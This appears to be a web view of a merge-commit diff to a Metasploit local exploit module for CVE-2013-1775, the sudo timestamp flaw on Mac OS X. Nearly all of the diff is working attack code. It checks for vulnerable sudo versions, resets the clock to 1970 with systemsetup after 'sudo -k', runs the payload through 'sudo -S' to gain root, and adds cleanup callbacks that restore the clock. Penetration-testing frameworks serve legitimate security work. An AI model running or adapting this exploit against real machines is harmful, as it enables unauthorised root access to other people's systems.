Merge pull request #2 from jvazquez-r7/test_osx
merge in @jvazquez-r7's fixes for osx sudo modulebug/bundler_fix
commit
155f336b6f
|
@ -37,32 +37,41 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
ran the sudo command.
|
ran the sudo command.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' => [ 'joev <jvennix[at]rapid7.com>'],
|
'Author' =>
|
||||||
'Platform' => [ 'osx' ],
|
|
||||||
'SessionTypes' => [ 'shell', 'meterpreter'],
|
|
||||||
'References' => [['CVE', '2013-1775']],
|
|
||||||
'Platform' => 'osx',
|
|
||||||
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
|
|
||||||
'Targets' => [
|
|
||||||
[
|
[
|
||||||
'Mac OS X x86 (Native Payload)', {
|
'Todd C. Miller', # Vulnerability discovery
|
||||||
|
'joev <jvennix[at]rapid7.com>' # Metasploit module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2013-1775'],
|
||||||
|
['OSVDB', '90677']
|
||||||
|
],
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],
|
||||||
|
'SessionTypes' => [ 'shell', 'meterpreter'],
|
||||||
|
'Targets' => [
|
||||||
|
[ 'Mac OS X x86 (Native Payload)',
|
||||||
|
{
|
||||||
'Platform' => 'osx',
|
'Platform' => 'osx',
|
||||||
'Arch' => ARCH_X86
|
'Arch' => ARCH_X86
|
||||||
}
|
}
|
||||||
], [
|
],
|
||||||
'Mac OS X x64 (Native Payload)', {
|
[ 'Mac OS X x64 (Native Payload)',
|
||||||
|
{
|
||||||
'Platform' => 'osx',
|
'Platform' => 'osx',
|
||||||
'Arch' => ARCH_X64
|
'Arch' => ARCH_X86_64
|
||||||
}
|
}
|
||||||
], [
|
],
|
||||||
'CMD', {
|
[ 'CMD',
|
||||||
|
{
|
||||||
'Platform' => 'unix',
|
'Platform' => 'unix',
|
||||||
'Arch' => ARCH_CMD
|
'Arch' => ARCH_CMD
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
'DefaultOptions' => { "PrependFork" => true },
|
'DefaultTarget' => 0,
|
||||||
'DefaultTarget' => 0
|
'DisclosureDate' => 'Feb 28 2013'
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -73,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
sudo_vn = $1
|
sudo_vn = $1
|
||||||
sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i)
|
sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i)
|
||||||
# check vn between 1.6.0 through 1.7.10p6
|
# check vn between 1.6.0 through 1.7.10p6
|
||||||
# and 1.8.0 through 1.8.6p6
|
# and 1.8.0 through 1.8.6p6
|
||||||
if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
|
if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
|
||||||
print_error "sudo version #{sudo_vn} not vulnerable."
|
print_error "sudo version #{sudo_vn} not vulnerable."
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
|
@ -84,8 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
if not user_in_admin_group?
|
if not user_in_admin_group?
|
||||||
print_error "sudo version is vulnerable, but user is not in the "+
|
print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
|
||||||
"admin group (necessary to change the date)."
|
|
||||||
Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
# one root for you sir
|
# one root for you sir
|
||||||
|
@ -108,30 +116,48 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
print_status("Payload dropped and registered for cleanup")
|
print_status("Payload dropped and registered for cleanup")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -gettime")
|
||||||
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
|
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -getdate")
|
||||||
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
|
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -getusingnetworktime")
|
||||||
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
|
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -gettimezone")
|
||||||
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
|
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
|
||||||
@network_server = if @networked
|
@network_server = if @networked
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -getnetworktimeserver")
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
|
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
print_warning("Cleanup to be done in case something goes really bad")
|
||||||
|
print_warning("Execute: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
|
||||||
|
print_warning("Execute: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
|
||||||
|
print_warning("Execute: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
|
||||||
|
if @networked
|
||||||
|
print_warning("Execute: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
|
||||||
|
if @network_server
|
||||||
|
print_warning("Execute: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
run_sudo_cmd
|
run_sudo_cmd
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def cleanup
|
def cleanup
|
||||||
return if @_cleaning_up
|
print_status("cleanup callback")
|
||||||
@_cleaning_up = true
|
if not @_cleaning_up
|
||||||
|
@_cleaning_up = true
|
||||||
|
do_cleanup
|
||||||
|
end
|
||||||
|
super
|
||||||
|
end
|
||||||
|
|
||||||
print_status("Resetting system clock to original values") if @time
|
def on_new_session(session)
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
|
print_status("on_new_session callback")
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
|
if not @_cleaning_up
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
|
@_cleaning_up = true
|
||||||
if @networked
|
do_cleanup
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
|
|
||||||
unless @network_server.nil?
|
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
@ -145,9 +171,17 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
['sudo', '-S', payload.encoded].join(' ')
|
['sudo', '-S', payload.encoded].join(' ')
|
||||||
end
|
end
|
||||||
|
|
||||||
# to prevent the password prompt from destroying session
|
# Ugly stuff just to test CMD tar isnt running because of the env variables not being preserved
|
||||||
sudo_cmd = 'echo "" | '+sudo_cmd_raw
|
sudo_cmd_raw.gsub!(/python/, "/usr/bin/python")
|
||||||
|
sudo_cmd_raw.gsub!(/ruby/, "/usr/bin/ruby")
|
||||||
|
sudo_cmd_raw.gsub!(/sh/, "/bin/sh")
|
||||||
|
|
||||||
|
## to prevent the password prompt from destroying session
|
||||||
|
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & sleep 5'
|
||||||
|
|
||||||
|
print_status("Executing: sudo -k; \n"+
|
||||||
|
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
|
||||||
|
" -settimezone GMT -settime 00:00")
|
||||||
cmd_exec(
|
cmd_exec(
|
||||||
"sudo -k; \n"+
|
"sudo -k; \n"+
|
||||||
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
|
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
|
||||||
|
@ -166,6 +200,28 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
print_good output
|
print_good output
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def do_cleanup
|
||||||
|
print_status("Resetting system clock to original values") if @time
|
||||||
|
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
|
||||||
|
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
|
||||||
|
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
|
||||||
|
|
||||||
|
if @networked
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
|
||||||
|
unless @network_server.nil?
|
||||||
|
print_status("Executing: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
# helper methods for accessing datastore
|
# helper methods for accessing datastore
|
||||||
def using_native_target?; target.name =~ /native/i; end
|
def using_native_target?; target.name =~ /native/i; end
|
||||||
def using_cmd_target?; target.name =~ /cmd/i; end
|
def using_cmd_target?; target.name =~ /cmd/i; end
|
Loading…
Reference in New Issue